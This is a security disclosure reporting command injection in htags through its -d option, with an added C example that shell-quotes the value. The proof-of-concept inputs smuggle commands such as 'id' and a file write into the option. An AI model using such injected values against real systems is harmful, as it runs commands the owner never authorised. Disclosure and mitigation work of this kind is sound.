Hi, I found a security vulnerability in htags. htags takes the input provided in the dbpath option (-d) and appends it to a command string that will later be executed by the system() function, without any escaping, leading to a command injection vulnerability.

Vulnerable code: src/htags/htags.c:L1336

Reproduce:
- Run htags by injecting a command in the dbpath argument (-d):

    $ htags --suggest2 -d '&& id'
    // SNIP
    uid=1000(user1) gid=1000(user1) groups=1000(user1),24(cdrom),25(floppy),27(sudo)
    htags: GPATH, GTAGS and/or GRTAGS not found. Please reexecute htags with the -g option.
    $ htags --suggest2 -d '$(pwd>/tmp/w)'
    $ cat /tmp/w
    /home/user1/tests

Environment: Tested in Debian 12, htags version 6.6.12

Mitigation: Options added to or used in system commands should be validated and escaped before being used.

Best Regards
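
The escaping that the report's mitigation asks for, as an added example that is not part of the original report and is not htags code: the option value is single-quoted for a POSIX shell before it is placed in the command string. The names `shell_quote`, `build_command` and `example-tool` are hypothetical, the inputs are constructed from the report's reproduce step, and the command is only printed, never executed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Quote s for a POSIX shell: wrap it in single quotes and rewrite each
 * embedded ' as '\''. Returns a malloc'd string, or NULL on failure. */
char *shell_quote(const char *s)
{
    size_t n = 2;                         /* opening and closing quote */
    for (const char *p = s; *p; p++)
        n += (*p == '\'') ? 4 : 1;
    char *out = malloc(n + 1);
    if (out == NULL)
        return NULL;
    char *q = out;
    *q++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p == '\'') {
            memcpy(q, "'\\''", 4);        /* close, escaped quote, reopen */
            q += 4;
        } else {
            *q++ = *p;
        }
    }
    *q++ = '\'';
    *q = '\0';
    return out;
}

/* Build "<prog> -d <quoted dbpath>"; returns 0, or -1 on error/truncation. */
int build_command(char *buf, size_t len, const char *prog, const char *dbpath)
{
    char *quoted = shell_quote(dbpath);
    if (quoted == NULL)
        return -1;
    int n = snprintf(buf, len, "%s -d %s", prog, quoted);
    free(quoted);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

int main(void)
{
    char cmd[256];
    const char *samples[] = { "&& id", "$(pwd>/tmp/w)", "it's" }; /* constructed */
    for (size_t i = 0; i < 3; i++)
        if (build_command(cmd, sizeof cmd, "example-tool", samples[i]) == 0)
            puts(cmd);                    /* printed only, never run */
    return 0;
}
```

Passing the value as a separate argv element to an exec-family call, with no shell involved, removes the need for quoting altogether.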
